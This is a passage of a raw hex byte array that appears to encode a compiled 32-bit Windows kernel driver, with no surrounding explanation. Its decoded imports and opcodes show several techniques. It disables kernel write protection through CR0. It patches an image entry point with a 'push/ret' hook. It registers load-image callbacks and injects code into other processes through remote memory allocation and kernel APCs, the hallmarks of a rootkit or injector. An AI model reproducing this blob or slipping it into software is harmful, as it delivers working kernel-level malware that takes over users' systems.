0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x10,0x00,0x00,0xc8,0x00,0x00,0x00,0x27,0x30,0x2e,0x30,0x34,0x30,0x3b,0x30, 0x4d,0x30,0x54,0x30,0x66,0x30,0x73,0x30,0x85,0x30,0x97,0x30,0x9e,0x30,0xba,0x30, 0xd5,0x30,0xdc,0x30,0xee,0x30,0x03,0x31,0x0d,0x31,0x2b,0x31,0x38,0x31,0x40,0x31, 0x46,0x31,0x4d,0x31,0x66,0x31,0x6e,0x31,0x74,0x31,0x7b,0x31,0x88,0x31,0x8f,0x31, 0x9e,0x31,0xa4,0x31,0xb6,0x31,0xbd,0x31,0xca,0x31,0xd1,0x31,0xef,0x31,0xf4,0x31, 0x7e,0x32,0x85,0x32,0x95,0x32,0xa0,0x32,0xae,0x32,0xb5,0x32,0xe3,0x32,0x00,0x33, 0x0a,0x33,0x17,0x33,0x2b,0x33,0x31,0x33,0x3b,0x33,0x63,0x33,0x68,0x33,0x70,0x33, 0x78,0x33,0x83,0x33,0xc4,0x33,0xca,0x33,0xcf,0x33,0xd7,0x33,0xec,0x33,0xf1,0x33, 0x05,0x34,0x0a,0x34,0x2a,0x34,0x56,0x34,0x86,0x34,0x8c,0x34,0x9b,0x34,0xa3,0x34, 0xc0,0x34,0xc9,0x34,0xd0,0x34,0xe2,0x34,0xe8,0x34,0xee,0x34,0xf4,0x34,0xfa,0x34, 0x00,0x35,0x06,0x35,0x0c,0x35,0x12,0x35,0x18,0x35,0x1e,0x35,0x24,0x35,0x2a,0x35, 0x30,0x35,0x36,0x35,0x3c,0x35,0x42,0x35,0x48,0x35,0x4e,0x35,0x54,0x35,0x5a,0x35, 0x60,0x35,0x66,0x35,0x6c,0x35,0x72,0x35,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x55,0x8b,0xec,0x83,0xec,0x10,0x8b,0x45,0x08,0x50,0xe8,0xd1,0xe1,0xff,0xff,0xc7, 0x45,0xf8,0x00,0x16,0x00,0x00,0x8b,0x4d,0xf8,0x51,0x6a,0x00,0xff,0x15,0xe0,0x02, 0x00,0x10,0x89,0x45,0xfc,0x83,0x7d,0xfc,0x00,0x74,0x4a,0x68,0x00,0x16,0x00,0x00, 0x68,0x60,0x39,0x00,0x10,0x8b,0x55,0xfc,0x52,0xe8,0x80,0xdc,0xff,0xff,0x83,0xc4, 0x0c,0x8b,0x45,0x08,0x50,0x68,0x14,0x2e,0x00,0x10,0xe8,0x51,0xd6,0xff,0xff,0x89, 0x45,0xf0,0x8b,0x4d,0x08,0x51,0x68,0x10,0x2e,0x00,0x10,0xe8,0x40,0xd6,0xff,0xff, 0x89,0x45,0xf4,0x8b,0x55,0xf0,0x8b,0x45,0xf8,0x89,0x02,0x8b,0x4d,0xf4,0x8b,0x55, 0xfc,0x89,0x11,0xeb,0x0d,0x68,0xec,0x09,0x00,0x10,0xe8,0x03,0xdc,0xff,0xff,0x83, 0xc4,0x04,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x6a,0x01,0xff,0x15,0x00,0x03,0x00,0x10,0x0f,0x20,0xc0,0x25,0xff, 0xff,0xfe,0xff,0x0f,0x22,0xc0,0x5d,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x0f,0x20,0xc0,0x0d,0x00,0x00,0x01,0x00,0x0f,0x22,0xc0,0x5d,0xc3, 0x55,0x8b,0xec,0x83,0xec,0x14,0xe8,0xc5,0xff,0xff,0xff,0x6a,0x06,0x68,0xf4,0x2d, 0x00,0x10,0xa1,0x0c,0x2e,0x00,0x10,0x50,0xe8,0xe1,0xdb,0xff,0xff,0x83,0xc4,0x0c, 0xe8,0xcb,0xff,0xff,0xff,0x8b,0x4d,0x0c,0x51,0x8b,0x55,0x08,0x52,0xff,0x15,0x0c, 0x2e,0x00,0x10,0x89,0x45,0xfc,0x8b,0x45,0xfc,0x50,0x68,0x04,0x0a,0x00,0x10,0xe8, 0x7e,0xdb,0xff,0xff,0x83,0xc4,0x08,0x68,0x00,0x54,0x00,0x10,0xff,0x15,0x04,0x03, 0x00,0x10,0x85,0xc0,0x75,0x07,0xc6,0x05,0xfa,0x2d,0x00,0x10,0x01,0x83,0x7d,0xfc, 0x00,0x0f,0x8c,0x1c,0x01,0x00,0x00,0x8b,0x0d,0xfc,0x2d,0x00,0x10,0x51,0x6a,0x00, 0xff,0x15,0xe0,0x02,0x00,0x10,0x89,0x45,0xf8,0x83,0x7d,0xf8,0x00,0x0f,0x84,0xf6, 0x00,0x00,0x00,0x8b,0x15,0xfc,0x2d,0x00,0x10,0x52,0xa1,0x1c,0x2e,0x00,0x10,0x50, 0x8b,0x4d,0xf8,0x51,0xe8,0x65,0xdb,0xff,0xff,0x83,0xc4,0x0c,0x8b,0x15,0x08,0x2e, 0x00,0x10,0x2b,0x15,0x00,0x2e,0x00,0x10,0x52,0x8b,0x45,0xf8,0x50,0xe8,0x4e,0xd8, 0xff,0xff,0xe8,0x19,0xff,0xff,0xff,0x8b,0x0d,0x04,0x2e,0x00,0x10,0x51,0x8b,0x55, 0xf8,0x03,0x15,0x00,0x2e,0x00,0x10,0x52,0xa1,0x08,0x2e,0x00,0x10,0x50,0xe8,0x2b, 0xdb,0xff,0xff,0x83,0xc4,0x0c,0xe8,0x15,0xff,0xff,0xff,0x8b,0x0d,0x08,0x2e,0x00, 0x10,0x2b,0x0d,0x00,0x2e,0x00,0x10,0x89,0x4d,0xf0,0x8b,0x55,0xf0,0x52,0xe8,0x4d, 0xfe,0xff,0xff,0x8b,0x45,0xf0,0x50,0x68,0x90,0x25,0x00,0x10,0xe8,0xdf,0xd4,0xff, 0xff,0x89,0x45,0xf4,0x8b,0x4d,0xf4,0x51,0x68,0x34,0x0a,0x00,0x10,0xe8,0xb0,0xda, 0xff,0xff,0x83,0xc4,0x08,0xc7,0x45,0xec,0x00,0x00,0x00,0x00,0x0f,0xb6,0x15,0xfa, 0x2d,0x00,0x10,0xf7,0xda,0x1b,0xd2,0x23,0x15,0x1c,0x2e,0x00,0x10,0x52,0x8b,0x45, 0xf4,0x50,0x6a,0x00,0x6a,0x00,0x6a,0x00,0x68,0xff,0xff,0x1f,0x00,0x8d,0x4d,0xec, 0x51,0xff,0x15,0xf4,0x02,0x00,0x10,0x89,0x45,0xfc,0x83,0x7d,0xfc,0x00,0x7c,0x0c, 0x8b,0x55,0xec,0x52,0xff,0x15,0xb4,0x02,0x00,0x10,0xeb,0x11,0x8b,0x45,0xfc,0x50, 0x68,0x60,0x0a,0x00,0x10,0xe8,0x58,0xda,0xff,0xff,0x83,0xc4,0x08,0x6a,0x00,0x8b, 0x4d,0xf8,0x51,0xff,0x15,0x90,0x02,0x00,0x10,0x8b,0x55,0x08,0xc7,0x42,0x34,0x00, 0x00,0x00,0x00,0x8b,0x45,0xfc,0x8b,0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x08,0x8b,0x45,0x08,0x8b,0x4d,0x08,0x03,0x48,0x3c,0x89, 0x4d,0xfc,0x8b,0x55,0xfc,0x8b,0x45,0x08,0x03,0x42,0x28,0x89,0x45,0xf8,0x6a,0x06, 0x8b,0x4d,0xf8,0x51,0x68,0xf4,0x2d,0x00,0x10,0xe8,0x40,0xda,0xff,0xff,0x83,0xc4, 0x0c,0x8b,0x55,0xf8,0x89,0x15,0x0c,0x2e,0x00,0x10,0xe8,0x01,0xfe,0xff,0xff,0x8b, 0x45,0xf8,0xc6,0x00,0x68,0x8b,0x4d,0xf8,0xc7,0x41,0x01,0x20,0x50,0x00,0x10,0x8b, 0x55,0xf8,0xc6,0x42,0x05,0xc3,0xe8,0x05,0xfe,0xff,0xff,0x68,0x20,0x50,0x00,0x10, 0x8b,0x45,0xf8,0x50,0x68,0x88,0x0a,0x00,0x10,0xe8,0xc4,0xd9,0xff,0xff,0x83,0xc4, 0x0c,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x30,0x8b,0x45,0x0c,0xc7,0x00,0x00,0x00,0x00,0x00,0x8b, 0x4d,0x10,0xc7,0x01,0x00,0x00,0x00,0x00,0x8b,0x55,0x08,0x8b,0x45,0x08,0x03,0x42, 0x3c,0x89,0x45,0xf8,0x8b,0x4d,0xf8,0x0f,0xb7,0x51,0x14,0x8b,0x45,0xf8,0x8d,0x4c, 0x10,0x18,0x89,0x4d,0xf0,0xc7,0x45,0xfc,0x00,0x00,0x00,0x00,0xc7,0x45,0xf4,0x00, 0x00,0x00,0x00,0xc7,0x45,0xec,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x55,0xec,0x83, 0xc2,0x01,0x89,0x55,0xec,0x8b,0x45,0xf8,0x0f,0xb7,0x48,0x06,0x39,0x4d,0xec,0x0f, 0x83,0xdc,0x00,0x00,0x00,0x8b,0x55,0xf0,0x8b,0x45,0x08,0x03,0x42,0x0c,0x89,0x45, 0xdc,0x8b,0x4d,0xf0,0x8b,0x51,0x24,0x81,0xe2,0x00,0x00,0x00,0x02,0x0f,0x84,0xb0, 0x00,0x00,0x00,0x68,0xc8,0x0a,0x00,0x10,0x8d,0x45,0xe0,0x50,0xe8,0x0f,0xe0,0xff, 0xff,0x85,0xc0,0x0f,0x84,0x9a,0x00,0x00,0x00,0x83,0x7d,0xfc,0x00,0x74,0x4f,0x8b, 0x4d,0xfc,0x03,0x4d,0xf4,0x8b,0x55,0xf0,0x39,0x4a,0x0c,0x75,0x41,0x8b,0x45,0xf8, 0x8b,0x48,0x38,0x83,0xe9,0x01,0x8b,0x55,0xf0,0x23,0x4a,0x08,0x74,0x1c,0x8b,0x45, 0xf8,0x8b,0x48,0x38,0x83,0xe9,0x01,0xf7,0xd1,0x8b,0x55,0xf0,0x23,0x4a,0x08,0x8b, 0x45,0xf8,0x03,0x48,0x38,0x89,0x4d,0xd4,0xeb,0x09,0x8b,0x4d,0xf0,0x8b,0x51,0x08, 0x89,0x55,0xd4,0x8b,0x45,0xf4,0x03,0x45,0xd4,0x89,0x45,0xf4,0xeb,0x45,0x8b,0x4d, 0xf0,0x8b,0x51,0x0c,0x89,0x55,0xfc,0x8b,0x45,0xf8,0x8b,0x48,0x38,0x83,0xe9,0x01, 0x8b,0x55,0xf0,0x23,0x4a,0x08,0x74,0x1c,0x8b,0x45,0xf8,0x8b,0x48,0x38,0x83,0xe9, 0x01,0xf7,0xd1,0x8b,0x55,0xf0,0x23,0x4a,0x08,0x8b,0x45,0xf8,0x03,0x48,0x38,0x89, 0x4d,0xd0,0xeb,0x09,0x8b,0x4d,0xf0,0x8b,0x51,0x08,0x89,0x55,0xd0,0x8b,0x45,0xd0, 0x89,0x45,0xf4,0x8b,0x4d,0xf0,0x83,0xc1,0x28,0x89,0x4d,0xf0,0xe9,0x0b,0xff,0xff, 0xff,0x8b,0x55,0xf4,0x3b,0x15,0x04,0x2e,0x00,0x10,0x72,0x75,0x8b,0x45,0xfc,0x50, 0x8b,0x4d,0xf4,0x51,0x68,0xd0,0x0a,0x00,0x10,0xe8,0x54,0xd8,0xff,0xff,0x83,0xc4, 0x0c,0x8b,0x55,0x0c,0x8b,0x45,0xfc,0x89,0x02,0x8b,0x4d,0x10,0x8b,0x55,0xf4,0x89, 0x11,0x8b,0x45,0xf8,0x0f,0xb7,0x48,0x14,0x8b,0x55,0xf8,0x8d,0x44,0x0a,0x18,0x89, 0x45,0xf0,0xc7,0x45,0xd8,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x4d,0xd8,0x83,0xc1, 0x01,0x89,0x4d,0xd8,0x8b,0x55,0xf8,0x0f,0xb7,0x42,0x06,0x39,0x45,0xd8,0x73,0x1d, 0x8b,0x4d,0xf0,0x8b,0x51,0x24,0x81,0xe2,0xff,0xff,0xff,0xfd,0x8b,0x45,0xf0,0x89, 0x50,0x24,0x8b,0x4d,0xf0,0x83,0xc1,0x28,0x89,0x4d,0xf0,0xeb,0xce,0xb0,0x01,0xeb, 0x02,0x32,0xc0,0x8b,0xe5,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x20,0x83,0x3d,0x08,0x2e,0x00,0x10,0x00,0x74,0x05,0xe9, 0xd7,0x00,0x00,0x00,0x83,0x7d,0x0c,0x00,0x0f,0x85,0xcd,0x00,0x00,0x00,0x8b,0x45, 0x10,0x8b,0x08,0xc1,0xe9,0x08,0x83,0xe1,0x01,0x0f,0x84,0xbc,0x00,0x00,0x00,0xc6, 0x45,0xff,0x00,0x8b,0x55,0x10,0x8b,0x42,0x04,0x89,0x45,0xf4,0x8b,0x4d,0x10,0x8b, 0x51,0x0c,0x89,0x55,0xf8,0x8b,0x45,0xf8,0x50,0x8b,0x4d,0xf4,0x51,0x8b,0x55,0x08, 0x52,0x68,0x90,0x0b,0x00,0x10,0xe8,0x87,0xd7,0xff,0xff,0x83,0xc4,0x10,0xc7,0x45, 0xf0,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x45,0xf0,0x83,0xc0,0x01,0x89,0x45,0xf0, 0x83,0x7d,0xf0,0x07,0x73,0x33,0x8b,0x4d,0xf0,0x8b,0x14,0x8d,0xa4,0x2d,0x00,0x10, 0x52,0x8d,0x45,0xe8,0x50,0xff,0x15,0x20,0x03,0x00,0x10,0x6a,0x01,0x8d,0x4d,0xe8, 0x51,0x8b,0x55,0x08,0x52,0xe8,0x86,0xdf,0xff,0xff,0x0f,0xb6,0xc0,0x85,0xc0,0x74, 0x06,0xc6,0x45,0xff,0x01,0xeb,0x02,0xeb,0xbe,0x0f,0xb6,0x4d,0xff,0x85,0xc9,0x74, 0x3a,0xc7,0x45,0xe4,0x00,0x00,0x00,0x00,0xc7,0x45,0xe0,0x00,0x00,0x00,0x00,0x8d, 0x55,0xe0,0x52,0x8d,0x45,0xe4,0x50,0x8b,0x4d,0xf4,0x51,0xe8,0x60,0xfd,0xff,0xff, 0x0f,0xb6,0xd0,0x85,0xd2,0x74,0x14,0x8b,0x45,0xf4,0x03,0x45,0xe4,0xa3,0x08,0x2e, 0x00,0x10,0x8b,0x4d,0xf4,0x51,0xe8,0xc5,0xfc,0xff,0xff,0x8b,0xe5,0x5d,0xc2,0x0c, 0x00,0x00,0x00,0x00,0x40,0x55,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x1e,0x59,0x00,0x00,0x90,0x02,0x00,0x00,0x30,0x55,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x70,0x59,0x00,0x00,0x80,0x02,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x44,0x59,0x00,0x00,0x2c,0x59,0x00,0x00,0x5e,0x59,0x00,0x00,0x00,0x00,0x00,0x00, 0x1c,0x56,0x00,0x00,0x30,0x56,0x00,0x00,0x48,0x56,0x00,0x00,0x66,0x56,0x00,0x00, 0x82,0x56,0x00,0x00,0x9a,0x56,0x00,0x00,0xb0,0x56,0x00,0x00,0xba,0x56,0x00,0x00, 0xd4,0x56,0x00,0x00,0xe8,0x56,0x00,0x00,0xf2,0x56,0x00,0x00,0x0c,0x57,0x00,0x00, 0x26,0x57,0x00,0x00,0x3e,0x57,0x00,0x00,0x52,0x57,0x00,0x00,0x64,0x57,0x00,0x00, 0x7c,0x57,0x00,0x00,0x0e,0x56,0x00,0x00,0xb0,0x57,0x00,0x00,0xc4,0x57,0x00,0x00, 0xd4,0x57,0x00,0x00,0xe6,0x57,0x00,0x00,0x06,0x58,0x00,0x00,0x1a,0x58,0x00,0x00, 0x24,0x58,0x00,0x00,0x2e,0x58,0x00,0x00,0x46,0x58,0x00,0x00,0x50,0x58,0x00,0x00, 0x5a,0x58,0x00,0x00,0x76,0x58,0x00,0x00,0x98,0x58,0x00,0x00,0xb6,0x58,0x00,0x00, 0xd2,0x58,0x00,0x00,0xea,0x58,0x00,0x00,0x0a,0x59,0x00,0x00,0x04,0x56,0x00,0x00, 0xec,0x55,0x00,0x00,0x98,0x57,0x00,0x00,0xe0,0x55,0x00,0x00,0x00,0x00,0x00,0x00, 0x3c,0x00,0x44,0x62,0x67,0x50,0x72,0x69,0x6e,0x74,0x00,0x00,0x5f,0x05,0x52,0x74, 0x6c,0x49,0x6e,0x69,0x74,0x55,0x6e,0x69,0x63,0x6f,0x64,0x65,0x53,0x74,0x72,0x69, 0x6e,0x67,0x00,0x00,0x80,0x07,0x6d,0x65,0x6d,0x73,0x65,0x74,0x00,0x00,0x2a,0x03, 0x4b,0x65,0x53,0x65,0x74,0x45,0x76,0x65,0x6e,0x74,0x00,0x00,0x85,0x00,0x45,0x78, 0x46,0x72,0x65,0x65,0x50,0x6f,0x6f,0x6c,0x57,0x69,0x74,0x68,0x54,0x61,0x67,0x00, 0x41,0x04,0x4f,0x62,0x66,0x44,0x65,0x72,0x65,0x66,0x65,0x72,0x65,0x6e,0x63,0x65, 0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0x00,0xa6,0x04,0x50,0x73,0x4c,0x6f,0x6f,0x6b, 0x75,0x70,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x42,0x79,0x50,0x72,0x6f,0x63,0x65, 0x73,0x73,0x49,0x64,0x00,0x00,0xa8,0x04,0x50,0x73,0x4c,0x6f,0x6f,0x6b,0x75,0x70, 0x54,0x68,0x72,0x65,0x61,0x64,0x42,0x79,0x54,0x68,0x72,0x65,0x61,0x64,0x49,0x64, 0x00,0x00,0x25,0x05,0x52,0x74,0x6c,0x45,0x71,0x75,0x61,0x6c,0x55,0x6e,0x69,0x63, 0x6f,0x64,0x65,0x53,0x74,0x72,0x69,0x6e,0x67,0x00,0xd2,0x06,0x5a,0x77,0x46,0x72, 0x65,0x65,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x00, 0x7e,0x07,0x6d,0x65,0x6d,0x63,0x70,0x79,0x00,0x00,0x98,0x06,0x5a,0x77,0x41,0x6c, 0x6c,0x6f,0x63,0x61,0x74,0x65,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x4d,0x65,0x6d, 0x6f,0x72,0x79,0x00,0x58,0x07,0x5f,0x65,0x78,0x63,0x65,0x70,0x74,0x5f,0x68,0x61, 0x6e,0x64,0x6c,0x65,0x72,0x33,0x00,0x00,0xad,0x06,0x5a,0x77,0x43,0x6c,0x6f,0x73, 0x65,0x00,0x42,0x03,0x4b,0x65,0x55,0x6e,0x73,0x74,0x61,0x63,0x6b,0x44,0x65,0x74, 0x61,0x63,0x68,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x00,0x00,0xb7,0x02,0x4b,0x65, 0x44,0x65,0x6c,0x61,0x79,0x45,0x78,0x65,0x63,0x75,0x74,0x69,0x6f,0x6e,0x54,0x68, 0x72,0x65,0x61,0x64,0x00,0x00,0x48,0x03,0x4b,0x65,0x57,0x61,0x69,0x74,0x46,0x6f, 0x72,0x53,0x69,0x6e,0x67,0x6c,0x65,0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0xe8,0x02, 0x4b,0x65,0x49,0x6e,0x73,0x65,0x72,0x74,0x51,0x75,0x65,0x75,0x65,0x41,0x70,0x63, 0x00,0x00,0xd5,0x02,0x4b,0x65,0x49,0x6e,0x69,0x74,0x69,0x61,0x6c,0x69,0x7a,0x65, 0x41,0x70,0x63,0x00,0x39,0x03,0x4b,0x65,0x53,0x74,0x61,0x63,0x6b,0x41,0x74,0x74, 0x61,0x63,0x68,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x00,0x00,0x05,0x07,0x5a,0x77, 0x51,0x75,0x65,0x72,0x79,0x49,0x6e,0x66,0x6f,0x72,0x6d,0x61,0x74,0x69,0x6f,0x6e, 0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x00,0x34,0x04,0x4f,0x62,0x4f,0x70,0x65,0x6e, 0x4f,0x62,0x6a,0x65,0x63,0x74,0x42,0x79,0x50,0x6f,0x69,0x6e,0x74,0x65,0x72,0x00, 0xd9,0x02,0x4b,0x65,0x49,0x6e,0x69,0x74,0x69,0x61,0x6c,0x69,0x7a,0x65,0x45,0x76, 0x65,0x6e,0x74,0x00,0x54,0x05,0x52,0x74,0x6c,0x47,0x65,0x74,0x56,0x65,0x72,0x73, 0x69,0x6f,0x6e,0x00,0x6a,0x00,0x45,0x78,0x41,0x6c,0x6c,0x6f,0x63,0x61,0x74,0x65, 0x50,0x6f,0x6f,0x6c,0x00,0x00,0x9b,0x03,0x4d,0x6d,0x4d,0x61,0x70,0x4c,0x6f,0x63, 0x6b,0x65,0x64,0x50,0x61,0x67,0x65,0x73,0x53,0x70,0x65,0x63,0x69,0x66,0x79,0x43, 0x61,0x63,0x68,0x65,0x00,0x00,0xef,0x04,0x52,0x74,0x6c,0x43,0x6f,0x6d,0x70,0x61, 0x72,0x65,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x00,0x00,0x88,0x07,0x73,0x74,0x72,0x63, 0x6d,0x70,0x00,0x00,0x84,0x07,0x73,0x70,0x72,0x69,0x6e,0x74,0x66,0x00,0x69,0x04, 0x50,0x73,0x43,0x72,0x65,0x61,0x74,0x65,0x53,0x79,0x73,0x74,0x65,0x6d,0x54,0x68, 0x72,0x65,0x61,0x64,0x00,0x00,0x8a,0x07,0x73,0x74,0x72,0x6c,0x65,0x6e,0x00,0x00, 0x89,0x07,0x73,0x74,0x72,0x63,0x70,0x79,0x00,0x00,0x31,0x03,0x4b,0x65,0x53,0x65, 0x74,0x53,0x79,0x73,0x74,0x65,0x6d,0x41,0x66,0x66,0x69,0x6e,0x69,0x74,0x79,0x54, 0x68,0x72,0x65,0x61,0x64,0x00,0xb0,0x04,0x50,0x73,0x52,0x65,0x6d,0x6f,0x76,0x65, 0x4c,0x6f,0x61,0x64,0x49,0x6d,0x61,0x67,0x65,0x4e,0x6f,0x74,0x69,0x66,0x79,0x52, 0x6f,0x75,0x74,0x69,0x6e,0x65,0x00,0x00,0xbf,0x04,0x50,0x73,0x53,0x65,0x74,0x4c, 0x6f,0x61,0x64,0x49,0x6d,0x61,0x67,0x65,0x4e,0x6f,0x74,0x69,0x66,0x79,0x52,0x6f, 0x75,0x74,0x69,0x6e,0x65,0x00,0x12,0x07,0x5a,0x77,0x51,0x75,0x65,0x72,0x79,0x53, 0x79,0x73,0x74,0x65,0x6d,0x49,0x6e,0x66,0x6f,0x72,0x6d,0x61,0x74,0x69,0x6f,0x6e, 0x00,0x00,0x40,0x05,0x52,0x74,0x6c,0x46,0x72,0x65,0x65,0x55,0x6e,0x69,0x63,0x6f, 0x64,0x65,0x53,0x74,0x72,0x69,0x6e,0x67,0x00,0x00,0xdb,0x04,0x52,0x74,0x6c,0x41, 0x6e,0x73,0x69,0x53,0x74,0x72,0x69,0x6e,0x67,0x54,0x6f,0x55,0x6e,0x69,0x63,0x6f, 0x64,0x65,0x53,0x74,0x72,0x69,0x6e,0x67,0x00,0x00,0x5b,0x05,0x52,0x74,0x6c,0x49, 0x6e,0x69,0x74,0x41,0x6e,0x73,0x69,0x53,0x74,0x72,0x69,0x6e,0x67,0x00,0x6e,0x74, 0x6f,0x73,0x6b,0x72,0x6e,0x6c,0x2e,0x65,0x78,0x65,0x00,0x00,0x80,0x01,0x4e,0x64, 0x69,0x73,0x52,0x65,0x67,0x69,0x73,0x74,0x65,0x72,0x50,0x72,0x6f,0x74,0x6f,0x63, 0x6f,0x6c,0x00,0x00,0x69,0x00,0x4e,0x64,0x69,0x73,0x44,0x65,0x72,0x65,0x67,0x69, 0x73,0x74,0x65,0x72,0x50,0x72,0x6f,0x74,0x6f,0x63,0x6f,0x6c,0x00,0x00,0xb8,0x00, 0x4e,0x64,0x69,0x73,0x47,0x65,0x74,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x00,0x00, 0x4e,0x44,0x49,0x53,0x2e,0x53,0x59,0x53,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0xa4,0x3e,0xa8,0x3e,0x00,0x10,0x00,0x00, 0xf8,0x00,0x00,0x00,0x48,0x30,0x50,0x30,0x7b,0x30,0x82,0x30,0x89,0x30,0x90,0x30, 0x97,0x30,0x9e,0x30,0xa5,0x30,0xac,0x30,0xb3,0x30,0xba,0x30,0xc1,0x30,0xc8,0x30, 0xcf,0x30,0xd6,0x30,0xdd,0x30,0xe2,0x30,0xec,0x30,0x03,0x31,0x0d,0x31,0x1c,0x31, 0x2d,0x31,0x46,0x31,0x55,0x31,0x60,0x31,0x66,0x31,0x8f,0x31,0xab,0x31,0x52,0x33, 0x5a,0x33,0xb4,0x33,0xc5,0x33,0xcb,0x33,0xfa,0x33,0x63,0x34,0x96,0x34,0xb2,0x34, 0xc4,0x34,0xdd,0x34,0xef,0x34,0x22,0x35,0x3e,0x35,0x6d,0x35,0x86,0x35,0x8b,0x35, 0xd9,0x35,0xef,0x35,0xe6,0x36,0x0a,0x37,0x15,0x37,0x46,0x37,0x4b,0x37,0x8b,0x37, 0xac,0x37,0xbe,0x37,0xd9,0x37,0x31,0x38,0x45,0x38,0x71,0x38,0x87,0x38,0x69,0x39, 0x81,0x39,0x93,0x39,0xa6,0x39,0xc0,0x39,0xed,0x39,0xf3,0x39,0x04,0x3a,0x19,0x3a, 